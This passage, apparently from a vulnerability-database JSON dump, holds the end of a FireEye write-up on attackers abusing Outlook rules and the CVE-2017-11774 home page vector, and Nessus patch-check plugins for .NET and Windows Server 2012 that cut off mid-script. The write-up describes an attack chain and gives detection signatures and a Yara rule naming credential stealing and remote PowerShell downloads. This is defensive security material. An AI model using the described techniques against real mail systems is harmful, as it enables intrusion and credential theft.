WebDAV is likely the less alerting option from a networking perspective, as one is more likely to find WebDAV transactions occurring over ports 80 and 443 to the internet than they are to find a domain joined host communicating via SMB to a non-domain joined host at an arbitrary IP address.\n * The payload to be executed via Outlook client-side mail rule must contain no arguments, which is likely why a compiled Aut2exe executable was chosen. _95f3bea43338addc1ad951cd2d42eb6f_ does nothing but execute a PowerShell one-liner to retrieve additional malicious content for execution. However, execution of this command natively using an Outlook rule was not possible due to this limitation.\n\nWith that in mind, the initial infection vector is illustrated in Figure 4.\n\n \nFigure 4: Initial infection vector\n\nAs both attackers and defenders continue to explore email security, publicly-released techniques and exploits are quickly adopted. SensePost's identification and responsible [disclosure of CVE-2017-11774](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-11774>) was no different. For an excellent description of abusing Outlook's home page for shell and persistence from an attacker\u2019s perspective, [refer to SensePost's blog](<https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/>).\n\nFireEye [has observed](<https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf>) and [documented](<https://twitter.com/ItsReallyNick/status/1014522001900306433>) an uptick in several malicious attackers' usage of this specific home page exploitation technique. Based on our experience, this particular method may be more successful due to defenders misinterpreting artifacts and focusing on incorrect mitigations. 
This is understandable, as some defenders may first learn of successful CVE-2017-11774 exploitation when observing Outlook spawning processes resulting in malicious code execution. When this observation is combined with standalone forensic artifacts that may look similar to malicious HTML Application (.hta) attachments, the evidence may be misinterpreted as initial infection via a phishing email. This incorrect assumption overlooks the fact that attackers require valid credentials to deploy CVE-2017-11774, and thus the scope of the compromise may be greater than individual users' Outlook clients where home page persistence is discovered. To assist defenders, we're including a Yara rule to differentiate these Outlook home page payloads at the end of this post.\n\nUnderstanding this nuance further highlights the exposure to this technique when combined with password spraying as documented with this attacker, and underscores the importance of layered email security defenses, including multi-factor authentication and patch management. We recommend the organizations reduce their email attack surface as much as possible. Of note, organizations that choose to host their email with a cloud service provider must still ensure the software clients used to access that server are patched. 
Beyond implementing multi-factor authentication for Outlook 365/Exchange access, the Microsoft security updates in Table 3 will assist in mitigating known and documented attack vectors that are exposed for exploitation by toolkits such as SensePost\u2019s RULER.\n\n**Microsoft Outlook Security Update**\n\n| \n\n**RULER Module Addressed** \n \n---|--- \n \n[June 13, 2017 Security Update](<https://support.microsoft.com/en-us/help/3191938/descriptionofthesecurityupdateforoutlook2013june13-2017>)\n\n| \n\n[RULER.RULES](<https://sensepost.com/blog/2016/mapi-over-http-and-mailrule-pwnage/>) \n \n[September 12, 2017 Security Update](<https://support.microsoft.com/en-us/help/4011091/descriptionofthesecurityupdateforoutlook2016september12-2017>)\n\n| \n\n[RULER.FORMS](<https://sensepost.com/blog/2017/outlook-forms-and-shells/>) \n \n[October 10, 2017 Security Update](<https://support.microsoft.com/en-us/help/4011162/description-of-the-security-update-for-outlook-2016-october-10-2017>)\n\n| \n\n[RULER.HOMEPAGE](<https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/>) \n \nTable 3: Outlook attack surface mitigations\n\n#### Detecting the Techniques\n\nFireEye detected this activity across our platform, including named detection for POSHC2, PUPYRAT, and POWERTON. 
Table 4 contains several specific detection names that applied to the email exploitation and initial infection activity.****\n\n**PLATFORM**\n\n| \n\n**SIGNATURE NAME** \n \n---|--- \n \nEndpoint Security\n\n| \n\nPOWERSHELL ENCODED REMOTE DOWNLOAD (METHODOLOGY) \nSUSPICIOUS POWERSHELL USAGE (METHODOLOGY) \nMIMIKATZ (CREDENTIAL STEALER) \nRULER OUTLOOK PERSISTENCE (UTILITY) \n \nNetwork and Email Security\n\n| \n\nFE_Exploit_HTML_CVE201711774 \nFE_HackTool_Win_RULER \nFE_HackTool_Linux_RULER \nFE_HackTool_OSX_RULER \nFE_Trojan_OLE_RULER \nHackTool.RULER (Network Traffic) \n \nTable 4: FireEye product detections\n\nFor organizations interested in hunting for Outlook home page shell and persistence, we\u2019ve included a Yara rule that can also be used for context to differentiate these payloads from other scripts:\n\nrule Hunting_Outlook_Homepage_Shell_and_Persistence \n{ \nmeta: \nauthor = \"Nick Carr (@itsreallynick)\" \nreference_hash = \"506fe019d48ff23fac8ae3b6dd754f6e\" \nstrings: \n$script_1 = \"<htm\" ascii nocase wide \n$script_2 = \"<script\" ascii nocase wide \n$viewctl1_a = \"ViewCtl1\" ascii nocase wide \n$viewctl1_b = \"0006F063-0000-0000-C000-000000000046\" ascii wide \n$viewctl1_c = \".OutlookApplication\" ascii nocase wide \ncondition: \nuint16(0) != 0x5A4D and all of ($script*) and any of ($viewctl1*) \n}\n\n#### Acknowledgements\n\nThe authors would like to thank Matt Berninger for providing data science support for attribution augmentation projects, Omar Sardar (FLARE) for reverse engineering POWERTON, and Joseph Reyes (FireEye Labs) for continued comprehensive Outlook client exploitation product coverage.\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-21T14:00:00", "type": "fireeye", "title": "OVERRULED: Containing a Potentially Destructive Adversary", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11774", "CVE-2017-0213"], "modified": "2018-12-21T14:00:00", "id": "FIREEYE:A6971C196BCA3B73B3F64A1FE0801A5B", "href": "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2022-06-16T15:33:58", "description": "The Microsoft .NET Framework installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists when .NET Core or .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Core or .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Core or .NET Framework application. The update addresses the vulnerability by correcting how the .NET Core or .NET Framework web application handles web requests. 
(CVE-2020-1108)\n\n - An elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level. (CVE-2020-1066)", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-05-13T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft .NET Framework (May 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1066", "CVE-2020-1108"], "modified": "2021-05-24T00:00:00", "cpe": ["cpe:/a:microsoft:.net_framework"], "id": "SMB_NT_MS20_MAY_DOTNET.NASL", "href": "https://www.tenable.com/plugins/nessus/136564", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136564);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/05/24\");\n\n script_cve_id(\"CVE-2020-1066\", \"CVE-2020-1108\");\n script_xref(name:\"MSKB\", value:\"4556812\");\n script_xref(name:\"MSFT\", value:\"MS20-4556812\");\n script_xref(name:\"MSKB\", value:\"4556826\");\n script_xref(name:\"MSFT\", value:\"MS20-4556826\");\n script_xref(name:\"MSKB\", value:\"4556807\");\n script_xref(name:\"MSFT\", value:\"MS20-4556807\");\n script_xref(name:\"MSKB\", value:\"4556813\");\n script_xref(name:\"MSFT\", value:\"MS20-4556813\");\n script_xref(name:\"MSKB\", value:\"4556406\");\n script_xref(name:\"MSKB\", value:\"4556405\");\n script_xref(name:\"MSKB\", value:\"4556404\");\n script_xref(name:\"MSKB\", value:\"4556403\");\n script_xref(name:\"MSKB\", value:\"4556402\");\n script_xref(name:\"MSKB\", value:\"4556401\");\n script_xref(name:\"MSKB\", value:\"4556400\");\n script_xref(name:\"MSKB\", value:\"4556441\");\n script_xref(name:\"MSKB\", value:\"4552926\");\n script_xref(name:\"MSKB\", 
value:\"4552931\");\n script_xref(name:\"MSKB\", value:\"4556399\");\n script_xref(name:\"MSKB\", value:\"4552928\");\n script_xref(name:\"MSKB\", value:\"4552929\");\n script_xref(name:\"MSFT\", value:\"MS20-4556406\");\n script_xref(name:\"MSFT\", value:\"MS20-4556405\");\n script_xref(name:\"MSFT\", value:\"MS20-4556404\");\n script_xref(name:\"MSFT\", value:\"MS20-4556403\");\n script_xref(name:\"MSFT\", value:\"MS20-4556402\");\n script_xref(name:\"MSFT\", value:\"MS20-4556401\");\n script_xref(name:\"MSFT\", value:\"MS20-4556400\");\n script_xref(name:\"MSFT\", value:\"MS20-4556441\");\n script_xref(name:\"MSFT\", value:\"MS20-4552926\");\n script_xref(name:\"MSFT\", value:\"MS20-4552931\");\n script_xref(name:\"MSFT\", value:\"MS20-4556399\");\n script_xref(name:\"MSFT\", value:\"MS20-4552928\");\n script_xref(name:\"MSFT\", value:\"MS20-4552929\");\n script_xref(name:\"IAVA\", value:\"2020-A-0207-S\");\n\n script_name(english:\"Security Updates for Microsoft .NET Framework (May 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft .NET Framework installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft .NET Framework installation on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A denial of service vulnerability exists when .NET Core\n or .NET Framework improperly handles web requests. An\n attacker who successfully exploited this vulnerability\n could cause a denial of service against a .NET Core or\n .NET Framework web application. The vulnerability can be\n exploited remotely, without authentication. A remote\n unauthenticated attacker could exploit this\n vulnerability by issuing specially crafted requests to\n the .NET Core or .NET Framework application. 
The update\n addresses the vulnerability by correcting how the .NET\n Core or .NET Framework web application handles web\n requests. (CVE-2020-1108)\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2020-1066)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4556406/kb4556406\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4556405/kb4556405\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4556404/kb4556404\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4556403/kb4556403\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4556402/kb4556402\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4556401/kb4556401\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4556400/kb4556400\");\n # https://support.microsoft.com/en-us/help/4556441/kb4556441-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0a2bc4ce\");\n # https://support.microsoft.com/en-us/help/4556813/windows-10-update-kb4556813\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?da286489\");\n # https://support.microsoft.com/en-us/help/4556807/windows-10-update-kb4556807\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e8217353\");\n # https://support.microsoft.com/en-us/help/4552926/kb4552926-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3a03f407\");\n # https://support.microsoft.com/en-us/help/4556826/windows-10-update-kb4556826\n script_set_attribute(attribute:\"see_also\", 
value:\"http://www.nessus.org/u?22034bc1\");\n # https://support.microsoft.com/en-us/help/4552931/kb4552931-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6206e249\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4556399/kb4556399\");\n # https://support.microsoft.com/en-us/help/4556812/windows-10-update-kb4556812\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?229bf576\");\n # https://support.microsoft.com/en-us/help/4552928/kb4552928-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?52b55515\");\n # https://support.microsoft.com/en-us/help/4552929/kb4552929-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4aafe901\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released security updates for Microsoft .NET Framework.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1066\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:.net_framework\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_dotnet_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"microsoft_net_framework_installed.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('install_func.inc');\ninclude('misc_func.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-05';\nkbs = make_list(\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif ('Windows 8' >< productname && 'Windows 8.1' >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\nelse if ('Vista' >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\napp = 'Microsoft .NET Framework';\nget_install_count(app_name:app, exit_if_zero:TRUE);\ninstalls = get_combined_installs(app_name:app);\n\nvuln = 0;\n\nif (installs[0] == 0)\n{\n foreach install (installs[1])\n {\n version = install['version'];\n if( version != 
UNKNOWN_VER &&\n smb_check_dotnet_rollup(rollup_date:'05_2020', dotnet_ver:version))\n vuln++;\n }\n}\nif(vuln)\n{\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-30T17:10:50", "description": "The remote Windows host is missing security update 4019214 or cumulative update 4019216. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. 
(CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows Server 2012 May 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0238", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17-MAY_4019214.NASL", "href": "https://www.tenable.com/plugins/nessus/100054", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100054);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0220\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0238\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98102,\n 98103,\n 98111,\n 98127,\n 
98139,\n 98237,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274\n );\n script_xref(name:\"MSKB\", value:\"4019214\");\n script_xref(name:\"MSKB\", value:\"4019216\");\n script_xref(name:\"MSFT\", value:\"MS17-4019214\");\n script_xref(name:\"MSFT\", value:\"MS17-4019216\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows Server 2012 May 2017 Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4019214\nor cumulative update 4019216. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. 
An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. 
An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019214/windows-server-2012-update-kb4019214\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8ae1f0e3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4019214 or Cumulative update KB4019216.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n 